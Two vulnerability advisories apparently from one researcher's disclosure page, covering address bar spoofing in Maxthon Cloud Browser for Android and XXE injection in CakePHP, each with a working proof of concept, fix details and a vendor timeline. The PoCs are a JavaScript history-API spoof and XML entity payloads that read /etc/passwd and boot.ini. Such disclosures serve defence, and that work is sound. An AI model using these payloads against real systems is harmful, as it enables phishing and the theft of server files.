Maxthon Cloud Browser for Android Address Bar Spoofing
10.01.2014
CVE-2014-1449
Spoofing
# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background
Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."
2. Vulnerability
Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks.
3. Proof of Concept
<html>
<script>
function trigger() {
w = window.open("http://howl.overflow.pl");
w.location = "http://h0wl.pl";
setTimeout('w.location = "a.html"', 1000);
setTimeout('w.history.back();', 2000);
setTimeout('w.history.forward();', 2100);
}
</script>
<a href="javascript:trigger();">click</a>
</html>
PoC in action: http://howl.overflow.pl/maxthon1.mp4
4. Fix
No response from the vendor, silent fix applied in 4.1.5.2000 (can't confirm here, updated straight to 4.1.6.2000) or 4.1.6.2000
5. Timeline
10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try
10.03.2014 - advisory published
CakePHP XXE Injection
01.07.2012
CVE-2012-4399
Information Disclosure / RCE
# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# CVE: CVE-2012-4399
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background
Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."
2. Vulnerability
CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.
3. Proof of Concept
Linux:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
<xxe>&payload;</xxe>
</request>
Windows:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
<xxe>&payload;</xxe>
</request>
4. Fix
Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1
5. Timeline
1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release
